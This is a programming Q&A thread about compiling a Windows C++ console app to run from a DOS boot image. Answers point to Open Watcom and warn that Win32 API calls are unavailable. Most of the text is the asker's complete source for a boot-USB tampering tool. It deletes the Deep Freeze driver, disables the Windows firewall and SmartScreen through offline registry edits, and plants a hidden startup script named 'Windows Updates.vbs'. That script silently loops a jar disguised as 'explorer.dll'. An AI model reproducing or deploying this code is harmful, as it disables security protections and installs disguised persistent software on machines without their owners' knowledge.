# Compile existing C++ code to run in DOS

Tags: c++, linux, windows, batch-file

I currently have an app in C++ which copies some files to the user's HDD. I use Hiren's BootCD on a flash drive to launch the MiniXP and run my app under that, but the load times are kind of slow, so I thought of adding my app in the DOS image that came with the disk. My problem is that the app will not run because "This app cannot be run in DOS mode".

How can I run this application under DOS or possibly any other operating system which will boot quick enough from the USB drive?

My app is a console application, and it's code is:

```
#include <iostream>
#include <fstream>
#include <windows.h>
#include <string.h>
#include <sys/stat.h>
#include <stdio.h>
#include <io.h>
#define MAX 256
using namespace std;
string systemdrive;
string users[MAX];int userscontor=0;
bool choosew7orxp;
void menu();
bool exists(const std::string& dirName_in)
{
  DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
  if (ftyp == INVALID_FILE_ATTRIBUTES)
    return false;  //something is wrong with your path!

  if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
    return true;   // this is a directory!

  return false;    // this is not a directory!
}
bool fileexists (const std::string& name) {
  struct stat buffer;
  return (stat (name.c_str(), &buffer) == 0);
}
void checkdrive(char drive[])
{
    string s(drive);
    s+="Windows";
    if (exists(s))
    {
        systemdrive = string(drive);
    }
}
void list()
{
    int dr_type=99;
    char dr_avail[MAX];
    char *temp=dr_avail;
    /* 1st we fill the buffer */
    GetLogicalDriveStrings(MAX,dr_avail);
    while(*temp!=NULL) { // Split the buffer by null
        dr_type=GetDriveType(temp);
        switch(dr_type) {
            case 3: // Fixed
            checkdrive(temp);
            break;
        }
        temp += lstrlen(temp) +1; // incriment the buffer

    }

}
void copyfiles(string a1,string a2)
{
    system((char*)(string("copy /V \""+a1+"\" \""+a2+"\"").c_str()));
}
void redeepfreeze()
{
    system("cls");
    if (!fileexists(systemdrive+"DeepFrz.backup"))
    {
        cout << "> Backup does not exist!\n";
        Sleep(1000);
        menu();
    }
    else
    {
        cout <<"> Found Backup.\n";
        cout <<"> Restoring backup.\n";

        string f = systemdrive;
        f+="Windows\\System32\\drivers\\DeepFrz.sys";
        if( remove(f.c_str()) !=0 )
        {
            cout << "> Cannot delete file! Aborting.\n";
            Sleep(1000);
            menu();
        }
        copyfiles(systemdrive+"DeepFrz.backup",systemdrive+"Windows\\System32\\drivers\\DeepFrz.sys");
        cout <<"> Backup restored under \"DeepFrz.sys\"\n";
        Sleep(1000);
        menu();

    }
}
void disablefirewall()
{
    system("cls");
    cout <<"> Loading registery from windows machine...\n";
//    cout << "reg load HKLM\\OLD_SYSTEM "+systemdrive+"Windows\\System32\\Config\\System";
    system((char*)(string("reg load HKLM\\OLD_SYSTEM "+systemdrive+"Windows\\System32\\Config\\SYSTEM").c_str()));
    cout <<"> Registery loaded, disabling Firewall :3\n";
    for (int i=0;i<=9;i++)
    {
        char buff[33];
        system((char*)(string("reg add \"HKLM\\OLD_SYSTEM\\ControlSet00"+string(itoa(i,buff,10))+"\\services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
        system((char*)(string("reg add \"HKLM\\OLD_SYSTEM\\ControlSet00"+string(itoa(i,buff,10))+"\\services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
        system((char*)(string("reg add \"HKLM\\OLD_SYSTEM\\ControlSet00"+string(itoa(i,buff,10))+"\\services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
    }
//    system((char*)(string("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
//    system((char*)(string("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
//    system((char*)(string("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" /v EnableFirewall /t reg_dword /d 0 /f").c_str()));
    cout <<"> Operation completed,saving..\n";
    system("reg unload HKLM\\OLD_SYSTEM");
    cout <<"> Done.\n";
    Sleep(1000);
    menu();
}
void disablesmartscreen()
{
    system("cls");
    cout <<"> Loading registery from windows machine...\n";
    system((char*)(string("reg load HKLM\\OLD_SOFTWARE "+systemdrive+"Windows\\System32\\Config\\Software").c_str()));
    cout <<"> Registery loaded, disabling SmartScreen :3\n";
//    cout <<"reg add \"HKLM\\OLD_SOFTWARE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\" /v SmartScreenEnabled /t reg_sz /d Off /f";
//    system("pause");
    system((char*)(string("reg add \"HKLM\\OLD_SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\" /v SmartScreenEnabled /t reg_sz /d Off /f").c_str()));
    cout <<"> Operation completed,saving..\n";
    system("reg unload HKLM\\OLD_SOFTWARE");
    cout <<"> Done.\n";
    Sleep(1000);
    menu();
}
//}
void deldeepfreeze()
{
    system("cls");
    if (!fileexists(systemdrive+"Windows\\System32\\drivers\\DeepFrz.sys"))
    {
        cout << "> Deepfreeze does not exist!\n";
        Sleep(1000);
        menu();
    }
    else
    {
        cout <<"> Found DeepFreeze.\n";
        cout <<"> Creating backup.\n";
//        copyfiles(systemdrive+"Windows\\System32\\drivers\\DeepFrz.sys",systemdrive+"Windows\\System32\\drivers\\DeepFrz.backup");
        copyfiles(systemdrive+"Windows\\System32\\drivers\\DeepFrz.sys",systemdrive+"DeepFrz.backup");
        cout <<"> Attempting to unfreeze part one...\n";

        string f = systemdrive;
        f+="Windows\\System32\\drivers\\DeepFrz.sys";

        if( remove(f.c_str()) !=0 )
        {
            cout << "> Cannot delete file! Aborting.\n";
            Sleep(1000);
            menu();
        }

        cout <<"> Backup crated under \"DeepFrz.backup\"\n";
        cout <<"> Searching for \"ntfs.sys\"...\n";
        if (!fileexists(systemdrive+"Windows\\System32\\drivers\\ntfs.sys"))
        {
            cout <<" > ERROR. Cannot find ntfs.sys! Aborting.\n";
            Sleep(1000);
            menu();
        }
        else
        {
            cout << "> Patching ntfs.sys...\n";
            copyfiles(systemdrive+"Windows\\System32\\drivers\\ntfs.sys",systemdrive+"Windows\\System32\\drivers\\DeepFrz.sys");
            cout << "> Patching DONE. Computer unfrozen!\n";
            Sleep(1000);
            menu();
        }
    }
}
void list(char* dir,string users[],int &unr)
{
    int con=0;
    char originalDirectory[_MAX_PATH];

    // Get the current directory so we can return to it
    _getcwd(originalDirectory, _MAX_PATH);

    _chdir(dir);  // Change to the working directory
    _finddata_t fileinfo;

    // This will grab the first file in the directory
    // "*" can be changed if you only want to look for specific files
    intptr_t handle = _findfirst("*", &fileinfo);

    if(handle == -1)  // No files or directories found
    {
        cout <<"> No users found.\n";
        return;
    }

    do
    {
        if(strcmp(fileinfo.name, ".") == 0 || strcmp(fileinfo.name, "..") == 0)
            continue;
        if(fileinfo.attrib & _A_SUBDIR) // Use bitmask to see if this is a directory
        {
            users[con]=fileinfo.name;
            con++;
        }

//        else
//            cout << "This is a file." << endl;
    } while(_findnext(handle, &fileinfo) == 0);

    _findclose(handle); // Close the stream

    _chdir(originalDirectory);
    unr=con;
}

void installapp(char* app)
{
    system("cls");
    if (!fileexists(app))
    {
        cout << "> "<<app<<" does not exist!\n";
        Sleep(1000);
        menu();
    }
    else
    {
       if (choosew7orxp==true)///it's W7 or W8
       {
           string temp = systemdrive+"Users";
           string tmpu[MAX];
           int amont;
           list((char*)temp.c_str(),tmpu,amont);
           cout << "> Which user are you? Enter the #"<<"\n\n";
           for (int i=0;i<amont;i++)
           {
               cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
           }
           int nr;
           cin >> nr;
           while (nr<0||nr>amont)
           {
               cout << "Invalid number!\n";cin>>nr;
           }
           system("cls");
           cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
           string dest = systemdrive+"Users\\"+tmpu[nr]+"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup";
           cout <<"> Installing..\n";
           copyfiles(app,dest+"\\"+app);
           cout <<"> Done!\n";
           Sleep(1000);

       }
       else
       { ///it's WXP
           string temp = systemdrive+"Documents and Settings";
           string tmpu[MAX];
           int amont;
           list((char*)temp.c_str(),tmpu,amont);
           cout << "> Which user are you? Enter the #"<<"\n\n";
           for (int i=0;i<amont;i++)
           {
               cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
           }
           int nr;
           cin >> nr;
           while (nr<0||nr>amont)
           {
               cout << "Invalid number!\n";cin>>nr;
           }
           system("cls");
           cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
           string dest = systemdrive+"Documents and Settings\\"+tmpu[nr]+"\\Start Menu\\Programs\\Startup";
           cout <<"> Installing..\n";
           copyfiles(app,dest+"\\"+app);
           cout <<"> Done!\n";
           Sleep(1000);
       }
    }
}
void masseject_fix()
{
    system("cls");
    char letter;
    cout <<"> What is your default CD letter?\n";
    cin >> letter;
    letter=toupper(letter);
    cout <<"> Selected drive: \""<<letter<<":\\\".\n";

   if (choosew7orxp==true)///it's W7 or W8
   {
       string temp = systemdrive+"Users";
       string tmpu[MAX];
       int amont;
       list((char*)temp.c_str(),tmpu,amont);
       cout << "> Which user are you? Enter the #"<<"\n\n";
       for (int i=0;i<amont;i++)
       {
           cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
       }
       int nr;
       cin >> nr;
       while (nr<0||nr>amont)
       {
           cout << "Invalid number!\n";cin>>nr;
       }
       system("cls");
       cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
       string dest = systemdrive+"Users\\"+tmpu[nr]+"\\AppData\\Roaming";

       fstream fout((dest+"\\massdrive.txt").c_str(),ios::out);
       fout<<" "<<letter;
       fout.close();
       cout <<"> Done!\n";
       Sleep(1000);

   }
   else
   { ///it's WXP
       string temp = systemdrive+"Documents and Settings";
       string tmpu[MAX];
       int amont;
       list((char*)temp.c_str(),tmpu,amont);
       cout << "> Which user are you? Enter the #"<<"\n\n";
       for (int i=0;i<amont;i++)
       {
           cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
       }
       int nr;
       cin >> nr;
       while (nr<0||nr>amont)
       {
           cout << "Invalid number!\n";cin>>nr;
       }
       system("cls");
       cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
       string dest = systemdrive+"Documents and Settings\\"+tmpu[nr]+"\\Application Data";


       cout <<"> Done!\n";
       Sleep(1000);
   }

}
void installAppdata(char* app)
{
    if (!fileexists(app))
    {
        cout << "> "<<app<<" does not exist!\n";
        Sleep(1000);
        menu();
    }
    else
    {
       if (choosew7orxp==true)///it's W7 or W8
       {
           string temp = systemdrive+"Users";
           string tmpu[MAX];
           int amont;
           list((char*)temp.c_str(),tmpu,amont);
           cout << "> Which user are you? Enter the #"<<"\n\n";
           for (int i=0;i<amont;i++)
           {
               cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
           }
           int nr;
           cin >> nr;
           while (nr<0||nr>amont)
           {
               cout << "Invalid number!\n";cin>>nr;
           }
           system("cls");
           cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
           string dest = systemdrive+"Users\\"+tmpu[nr]+"\\AppData\\Roaming";
           cout <<"> Installing..\n";
           copyfiles(app,dest+"\\"+app);
           cout <<"> Done!\n";
           Sleep(1000);

       }
       else
       { ///it's WXP
           string temp = systemdrive+"Documents and Settings";
           string tmpu[MAX];
           int amont;
           list((char*)temp.c_str(),tmpu,amont);
           cout << "> Which user are you? Enter the #"<<"\n\n";
           for (int i=0;i<amont;i++)
           {
               cout << "User number #"<<i<<": "<<tmpu[i]<<"\n";
           }
           int nr;
           cin >> nr;
           while (nr<0||nr>amont)
           {
               cout << "Invalid number!\n";cin>>nr;
           }
           system("cls");
           cout << "> You selected user #"<<nr<<", which is \""<<tmpu[nr]<<"\".\n";
           string dest = systemdrive+"Documents and Settings\\"+tmpu[nr]+"\\Application Data";
           cout <<"> Installing..\n";
           copyfiles(app,dest+"\\"+app);
           cout <<"> Done!\n";
           Sleep(1000);
       }
    }
}
void installKirLoga()
{
    fstream temp("Windows Updates.vbs",ios::out);
    temp << "CreateObject(\"Wscript.Shell\").Run \"\"\"\" & \"%appdata%/xfrps.bat\" & \"\"\"\", 0, False";
    temp.close();
    installapp("Windows Updates.vbs");

    fstream temp2("xfrps.bat",ios::out);
    temp2 << ":loop\r\ndel \"%APPDATA%\\KirLoga.jar\"\r\nCOPY \"%APPDATA%\\explorer.dll_update\" \"%APPDATA%\\explorer.dll\"\r\njava -jar \"%APPDATA%\\explorer.dll\" 1\r\ngoto loop";
    temp2.close();

    installAppdata("xfrps.bat");
    installAppdata("explorer.dll_update");
    menu();

}
void install_custom()
{
    system("cls");
    char ch[MAX];
    cout <<"> Enter app name: ";
    cin  >>ch;
    installapp(ch);
    menu();
}
void menu()
{
    int choose;
    system("cls");
    cout <<"> This is the main menu. Please choose an option.\n";
    cout <<"> 1. Delete DeepFreeze\n";
    cout <<"> 2. Reinstall DeepFreeze\n";
    cout <<"> 3. Install MassEject\n";
    cout <<"> 4. Configure MassEject\n";
    cout <<"> 5. Install other app to Startup\n";
    cout <<"> 6. Disable SmartScren\n";
    cout <<"> 7. Disable Firewall\n";
    cout <<"> 8. Quickie (Administrator, E:\\) <not updated>\n";
    cout <<"> 9. Install KirLoga <only starts after reboot>\n";
    cin.get();
    cin >> choose;
    if (choose==1)
    {
        deldeepfreeze();
    }
    else if (choose==2)
    {
        redeepfreeze();
    }
    else if (choose==3)
    {
        installapp("MassEject.jar");
        menu();
    }else if (choose==4)
    {
         masseject_fix();
    }else if (choose==5)
    {
        install_custom();
    }else if (choose==6)
    {
        disablesmartscreen();
    }
    else if (choose==7)
    {
        disablefirewall();
    }
    else if (choose==8)
    {
        //TODO
    }
    else if (choose==9)
    {
        installKirLoga();
    }
}
void choose_os()
{
   system("cls");
   cout << "> Are you running on Windows 7 or 8.x? <A/B>"<<'\n';
   char choice;
   cin >> choice;
   switch(choice)
   {
       case 'a': choosew7orxp=true;break;
       case 'A': choosew7orxp=true;break;
       case 'b': choosew7orxp=false;break;
       case 'B': choosew7orxp=false;break;
       default: cout << "> No, that's not how you do it..."; Sleep(1000);choose_os();break;
   }
   system("cls");
}
int main()
{
    system("cls");
    cout << "> Welcome to Kiraly's pack utility.\n";
    cout << "> Scanning system drives...\n";
    list();
    cout << "> System drive identified: "<<systemdrive<<", is this correct? (Y/N) ";
    char cdr;
    cin >> cdr;
    while (cdr!='Y'&&cdr!='y'&&cdr!='N'&&cdr!='n')
    {
        cout << "Incorrect syntax. Please re-enter. ";
        cin >> cdr;
    }
    if (cdr=='n'||cdr=='N')
    {
        cout << "> Please enter the drive letter ONLY. Example: \"C\" not \"C:\\\" ";
        char drlet;
        cin >> drlet;
        if ((int)drlet>=97)
        {
            drlet-=32;
        }
        systemdrive="";systemdrive+=drlet;systemdrive+=":\\";
        cout <<"> The system drive letter has been set to: "<<systemdrive<<"\n";
    }
//    Sleep(1000);
    system(systemdrive.substr(0,2).c_str());
    choose_os();
    menu();

}
```

Comment: You have several questions here. Notice that many Linux distributions (e.g. Debian) can be configured to not start the Xorg server and run a login shell very early.

Comment: I added the linux question because that could be an alternative, but the most preferable way is to run the app under a DOS environment

Comment: Did you consider booting [freedos](http://www.freedos.org/)? BTW, your questions are confusing. Please edit your question to improve it. Ask only one question at a time. StackOverflow is for questions related to some source code, but you show no source code in your question.

Comment: And you generally need some operating system to write to the disk.

Comment: Is it a console app?

Comment: Updated my question. Yes, it's a console app

Comment: is there a registry in DOS?

Comment: I don't know actually, but I need to acces the registery somehow, but getting the app to run is the first priority

Comment: There is no registry (I'm showing my age here, I guess). I don't think the idea works at all, though - if you boot Windows XP from DVD, you don't get the installed registry either. After all, it's precisely when that registry is corrupted that you want to boot from DVD.

Answer (score 3, accepted):

First of all , you need a compiler that can produce DOS code, such as watcom c++ : http://www.openwatcom.org/index.php/Main_Page

Your program uses windows api calls (it includes windows.h), you will need to replace all these functions with their DOS equivalents or write substitutes yourself.

Comment: I will take a look at Watcom, as for Windows API calls, how else should I access DOS's "copy" command? I used the Windows API to use it's "copy" command which also features the /v (verify) command. Any DOS-equivalent?

Comment: @KiralyCraft, you seem to misunderstand what Windows API is. `GetLogicalDriveStrings`, `GetFileAttributesA`, `GetDriveType` are all windows API calls and will not be available in DOS, `reg.exe` that you call will not be callable in DOS either as it is Win32 executable.